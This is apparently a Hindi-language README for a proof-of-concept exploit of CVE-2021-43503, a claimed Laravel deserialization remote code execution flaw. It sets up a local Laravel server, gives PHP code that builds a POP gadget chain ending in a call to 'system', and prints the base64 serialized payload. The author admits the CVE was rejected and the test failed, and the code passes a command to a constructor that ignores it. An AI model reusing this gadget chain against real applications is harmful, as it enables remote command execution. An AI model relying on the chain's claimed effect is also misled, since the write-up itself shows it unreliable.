
CVE-2021-43503 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, एक Laravel डिसीरियलाइज़ेशन RCE भेद्यता। इसमें परीक्षण के लिए PHP POP चेन जनरेशन और HTTP-आधारित पेलोड डिलीवरी शामिल है।
चेतावनी यह भेद्यता रद्द कर दी गई है।
यह CVE-2021-43503 के बारे में है, मैं exp के माध्यम से इस भेद्यता को दोहरा नहीं सकता।
सेवा प्रारंभ करें
composer install
cp .env.example .env
php artisan key:generate
php artisan serve # it will listening 8000 port in localhost
POP श्रृंखला को एन्कोड करें
<?php
namespace Illuminate\Routing{
class PendingResourceRegistration{
protected $registrar;
protected $name;
protected $controller;
protected $options = [];
protected $registered = false;
public function __construct($b){
$this->registrar=$b;
}
}
}
namespace Illuminate\Queue\Capsule{
class Manager{
protected $manager;
public function __construct($c)
{
$this->manager->method=$c;
}
}
}
namespace Mockery{
class ClosureWrapper{
private $closure;
public function __construct(){
$this->closure="system";
}
}
}
namespace{
use Illuminate\Queue\Capsule\Manager;
use Illuminate\Routing\PendingResourceRegistration;
use Mockery\ClosureWrapper;
$c=new ClosureWrapper("mkdir hello");
$b=new Manager($c);
$a=new PendingResourceRegistration($b);
echo base64_encode(serialize($a));
}
नोट
मैंने
urlencode(serialize($a))कोbase64_encode(serialize($a))से बदल दिया है औरdirकोmkdir helloसे बदल दिया है ताकि RCE के सफल निष्पादन को दर्शाया जा सके।
यह ऊपर आउटपुट होगा (चेतावनी को अनदेखा करें):
Tzo0NjoiSWxsdW1pbmF0ZVxSb3V0aW5nXFBlbmRpbmdSZXNvdXJjZVJlZ2lzdHJhdGlvbiI6NTp7czoxMjoiACoAcmVnaXN0cmFyIjtPOjMyOiJJbGx1bWluYXRlXFF1ZXVlXENhcHN1bGVcTWFuYWdlciI6MTp7czoxMDoiACoAbWFuYWdlciI7Tzo4OiJzdGRDbGFzcyI6MTp7czo2OiJtZXRob2QiO086MjI6Ik1vY2tlcnlcQ2xvc3VyZVdyYXBwZXIiOjE6e3M6MzE6IgBNb2NrZXJ5XENsb3N1cmVXcmFwcGVyAGNsb3N1cmUiO3M6Njoic3lzdGVtIjt9fX1zOjc6IgAqAG5hbWUiO047czoxMzoiACoAY29udHJvbGxlciI7TjtzOjEwOiIAKgBvcHRpb25zIjthOjA6e31zOjEzOiIAKgByZWdpc3RlcmVkIjtiOjA7fQ==
HTTP GET से परीक्षण करें:

इसने public/ में hello/ सफलतापूर्वक नहीं बनाया।